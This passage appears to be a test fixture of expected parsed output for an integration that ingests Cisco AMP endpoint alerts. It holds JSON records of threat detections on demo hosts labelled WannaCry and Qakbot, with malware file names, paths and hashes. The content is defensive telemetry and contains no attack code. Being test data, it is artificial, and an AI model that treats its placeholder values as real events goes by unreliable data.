a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303565650559000", 
+ "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303565650558979", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "lsass.exe", + "pid": 768, + "hash": { + "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "md5": "4e568dbe3fff1a0025eb432dc929b78f" + } + }, + "@timestamp": "2021-01-14T19:29:09.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843658227Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303565650559000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.24D004A104-95.SBX.TG", + "computer": 
{ + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303565650558978", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "lsass.exe", + "pid": 768, + "hash": { + "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "md5": "4e568dbe3fff1a0025eb432dc929b78f" + } + }, + "@timestamp": "2021-01-14T19:29:09.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843660456Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303565650559000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.24D004A104-95.SBX.TG", + "computer": 
{ + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303565650558977", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:10:32.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 0, + "action": "Policy Update", + "ingested": "2021-09-12T17:31:29.843662300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "id": 
"6412662859016176000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648130 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:10:31.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 0, + "action": "Policy Update", + "ingested": "2021-09-12T17:31:29.843664186Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "id": "6412662854721208000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": 
{ + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648130 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "file": { + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:29.843666081Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6412662850426241000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6412662850426241035", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "file": { + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:29.843667970Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6412662850426241000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + 
"detection_id": "6412662850426241034", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "file": { + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:29.843669890Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6412662850426241000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6412662850426241033", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "file": { + "name": "el2j9fcqj.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe", + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_3", + "hostname": 
"Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:29.843671791Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6412662850426241000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.D177E09A9A-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + 
"connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412662850426241035", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "file": { + "name": "kepv86368.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe", + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:29.843673656Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6412662850426241000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.D177E09A9A-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412662850426241034", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "file": { + "name": "uqlq0o884.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe", + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { 
+ "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:29.843675538Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective 